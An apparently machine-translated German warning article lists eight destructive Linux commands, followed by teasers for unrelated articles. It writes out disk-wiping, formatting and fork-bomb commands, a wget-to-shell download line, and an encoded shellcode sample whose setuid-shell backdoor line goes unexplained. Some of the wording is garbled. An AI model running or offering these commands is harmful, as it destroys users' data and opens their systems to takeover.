8 tödliche Befehle, die niemals unter Linux ausgeführt werden sollten

8 tödliche Befehle, die niemals unter Linux ausgeführt werden sollten

Terminalbefehle unter Linux sind ziemlich destruktiv. Wenn Sie einen Befehl ausführen, wird Ihr System zerstört. Linux verlangt von Ihnen keine Bestätigung, wenn Sie einen Befehl ausführen.

Wenn Sie wissen, welche Befehle unter Linux nicht ausgeführt werden sollten, können Sie Ihr System schützen, wenn Sie unter Linux arbeiten. Nachfolgend finden Sie 8 tödliche Befehle, die Sie unter Linux niemals ausführen sollten.

8 tödliche Befehle, die niemals unter Linux ausgeführt werden sollten

1. rm -rf / – alles löschen

Der Befehl rm -rf / löscht alles, einschließlich Dateien auf Ihrer Festplatte und Dateien auf Mediengeräten, die an Ihren Computer angeschlossen sind.

Um diesen Befehl besser zu verstehen, analysieren Sie ihn wie folgt:

  • rm – Löschen Sie die folgenden Dateien.
  • -rf – führt rm aus (löscht alle Dateien und Ordner in einem angegebenen Ordner) und löscht alle Dateien zwangsweise, ohne Sie vorher zu fragen.
  • / – Sagt rm (sagen wir rm), dass es im Stammverzeichnis startet, einschließlich aller Dateien auf Ihrem Computer.

Linux wird diesem Befehl gerne folgen und alles löschen, ohne Sie zu warnen. Seien Sie also vorsichtig, wenn Sie diesen Befehl verwenden.

Darüber hinaus wird der Befehl rm auch auf sehr gefährliche Weise verwendet. Beispielsweise löscht rm –rf ~ alle Dateien in Ihrem Home-Ordner und rm -rf .* löscht alle Ihre Konfigurationsdateien.

2. Verschleierter Befehl rm –rf /

Hier ist ein Codeausschnitt aus dem gesamten Web:

char esp[] __attribute__ ((section(".text"))) /* esp release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" " \xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7 " "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80 \x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp - p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Dies ist im Wesentlichen eine andere Version von rm –rf / – die Ausführung dieses Befehls löscht auch alle Ihre Dateien, genau wie die Ausführung von rm –rf /.

3. :(){ :|: & };: – Eine Art Blockbuster

8 tödliche Befehle, die niemals unter Linux ausgeführt werden sollten

Die folgende Befehlszeile sieht sehr einfach aus, ihre Funktion ist jedoch tatsächlich sehr gefährlich:

:(){ :|: & };:

Dieser kurze Befehl erstellt neue Kopien von sich selbst. Das heißt, der Sicherungsvorgang selbst erfolgt kontinuierlich und führt schnell dazu, dass Ihre CPU und Ihr Speicher voll werden.

Außerdem kann es dazu führen, dass Ihr Computer einfriert. Im Grunde handelt es sich um einen Denial-of-Service-Angriff (DoS).

4. mkfs.ext4 /dev/sda1 – Festplattenformate

Der Befehl mkfs.ext4 /dev/sda1 ist recht einfach zu verstehen:

  • mkfs.ext4 – erstellt ein ext4-Dateisystem auf dem folgenden Gerät.
  • /dev/sda1 – identifiziert die erste Partition auf der ersten Festplatte, bei der es sich möglicherweise um die verwendete Festplatte handelt.

Die Kombination dieser beiden Befehle entspricht der Formatierung des Laufwerks C: unter Windows – löschen Sie alle Dateien auf Ihrer ersten Partition und ersetzen Sie sie durch das neue Dateisystem.

Dieser Befehl kann in vielen verschiedenen Formaten erscheinen, z. B. - mkfs.ext3 /dev/sdb2 formatiert die zweite Partition auf Ihrer zweiten Festplatte mit dem ext3-Dateisystem.

5. Befehl > /dev/sda – direkt auf eine Festplatte schreiben

8 tödliche Befehle, die niemals unter Linux ausgeführt werden sollten

Befehlszeile > /dev/sda – Führen Sie einen Befehl aus und geben Sie das Ergebnis dieses Befehls direkt auf Ihre erste Festplatte aus. Dabei werden Daten direkt auf die Festplatte geschrieben und Ihr Dateisystem zerstört.

  • Befehl – ​​Führen Sie einen Befehl aus (kann ein beliebiger Befehl sein).
  • > – sendet die Befehlsausgabe an den folgenden Speicherort.
  • /dev/sda – Befehlsausgabe direkt auf die Festplatte schreiben.

6. dd if=/dev/random of=/dev/sda – schreibt dumme Daten auf die Festplatte

Die Zeile dd if=/dev/random of=/dev/sda löscht Daten auf einer Ihrer Festplatten.

  • dd – dient zum Kopieren auf niedriger Ebene von einem Ort zum anderen.
  • if=/dev/random – Verwenden Sie /dev/random als Eingabe – möglicherweise werden Adressen wie /dev/zero angezeigt.
  • of=/dev/sda – Ausgabe auf die erste Festplatte, wobei das Dateisystem durch zufällige dumme Daten ersetzt wird.

7. mv ~ /dev/null – Verschieben Sie Ihr Home-Verzeichnis in ein Schwarzes Loch

/dev/null – Etwas nach /dev/null zu verschieben ist dasselbe wie es zu zerstören. Stellen Sie sich /dev/null als schwarzes Loch vor. mv ~ /dev/null sendet alle Ihre persönlichen Dateien an ein Schwarzes Loch.

  • mv – Verschieben Sie die folgende Datei oder den folgenden Ordner an einen anderen Speicherort.
  • ~ – Ihr gesamter Home-Ordner.
  • /dev/null – Verschieben Sie Ihren Home-Ordner nach /dev/null. Dadurch werden alle Ihre Dateien zerstört und die Originalkopien gelöscht.

8. wget http://example.com/something -O – | sh – Skript laden und ausführen

Der obige Befehl lädt ein Skript aus dem Internet herunter und sendet das Skript an sh, das den Inhalt des Skripts ausführt. Dies kann gefährlich sein, wenn Sie nicht sicher sind, was ein Skript ist, oder wenn Sie keine vertrauenswürdige Skriptquelle haben – führen Sie keine nicht vertrauenswürdigen Skripte aus.

wget – eine Datei herunterladen.

http://example.com/something – Laden Sie Dateien von diesem Speicherort herunter.

| – Leiten (senden) Sie die Ausgabe des Befehls wget (heruntergeladene Versionsdatei) direkt an einen anderen Befehl weiter.

sh – Datei an den sh-Befehl senden.

Weitere Artikel finden Sie weiter unten:

Spaß haben!


Bemerkenswerte Sicherheitsfunktionen im neuesten Windows 10

Bemerkenswerte Sicherheitsfunktionen im neuesten Windows 10

Mit dem Windows 10 Spring Creators Update (92,99 $ bei Amazon.com) gibt Ihnen Microsoft mehr Kontrolle über Ihre Daten und Konten. Nachdem Sie neue Funktionen wie Timeline, Teilen und die Einstellungen-App kennengelernt haben, möchten Sie sich wahrscheinlich mit diesem Trio neuer Datenschutzeinstellungen vertraut machen.

So schützen Sie Dateien vor versehentlichem Löschen durch Windows Defender

So schützen Sie Dateien vor versehentlichem Löschen durch Windows Defender

Windows Defender ist ein Antiviren- und Computersystem-Sicherheitstool mit der Fähigkeit, Malware zu beseitigen. Was aber, wenn dieses Tool versehentlich Ihre wichtigen Daten löscht?

So verwenden Sie die Microsoft Authenticator-App

So verwenden Sie die Microsoft Authenticator-App

Microsoft Authenticator ist eine Anwendung, die die Zwei-Faktor-Authentifizierung für unterstützte Apps und Websites ermöglicht.

So ändern Sie das Chromebook-Hintergrundbild ganz einfach

So ändern Sie das Chromebook-Hintergrundbild ganz einfach

Wenn Sie neu bei Chrome OS sind und ein Chromebook besitzen, können Sie auch dessen Standardhintergrund ändern. So ändern Sie das Desktop-Hintergrundbild auf dem Google Chromebook.

Ist der Ruhezustand schädlich für den PC?

Ist der Ruhezustand schädlich für den PC?

Der Ruhemodus entstand aus der Notwendigkeit heraus, den Computer rund um die Uhr eingeschaltet zu halten, ohne den Akku zu entladen, oder um sicherzustellen, dass das System im Gegensatz zum Ruhemodus nicht durch Stromausfälle beeinträchtigt wird.

So fügen Sie Informations-Tags für Nachrichten und Interessen in Windows 10 hinzu bzw. entfernen sie

So fügen Sie Informations-Tags für Nachrichten und Interessen in Windows 10 hinzu bzw. entfernen sie

Wetter-, Finanz-, Sport- und Verkehrsinformationskarten können aktiviert (hinzugefügt) oder deaktiviert (entfernt) werden. In dieser Anleitung erfahren Sie, wie Sie Informations-Tags für den News- und Interessen-Feed in Windows 10 hinzufügen und entfernen.

Detaillierte Anweisungen zum Entfernen von GhostDNS

Detaillierte Anweisungen zum Entfernen von GhostDNS

Haben Sie sich versehentlich mit GhostDNS infiziert und wissen nicht, was Sie tun sollen, weil alle von Ihnen verwendeten Antiviren-Tools diesen Trojaner offenbar nicht erfolgreich entfernen können? Dieser Artikel wird Ihnen helfen.

Anweisungen zur Verwendung von Windows Defender

Anweisungen zur Verwendung von Windows Defender

Wie wir alle wissen, verfügt Windows 10 über ein integriertes Echtzeit-Antivirenprogramm namens Windows Defender und tatsächliche Tests zeigen, dass dieses Tool relativ effektiv arbeitet.

So erhöhen Sie die virtuelle Speicherkapazität unter Windows

So erhöhen Sie die virtuelle Speicherkapazität unter Windows

Der virtuelle Speicher ist ein unverzichtbarer Bestandteil des Windows-Betriebssystems. Wenn der Arbeitsspeicher Ihres Computers nicht ausreicht, um ein Programm auszuführen, wechselt das Betriebssystem zur Verwendung des virtuellen Speichers.

So deaktivieren Sie die Warnung „Wenig Speicherplatz“ in Windows 10/8/7

So deaktivieren Sie die Warnung „Wenig Speicherplatz“ in Windows 10/8/7

Wenn sich die Warnung zu wenig Speicherplatz nicht auf das Systemlaufwerk (C:) bezieht und Sie sie entfernen möchten, finden Sie hier eine Registrierungsoptimierung, mit der Sie die Warnung zu wenig Speicherplatz in Windows 10/8/7 deaktivieren können.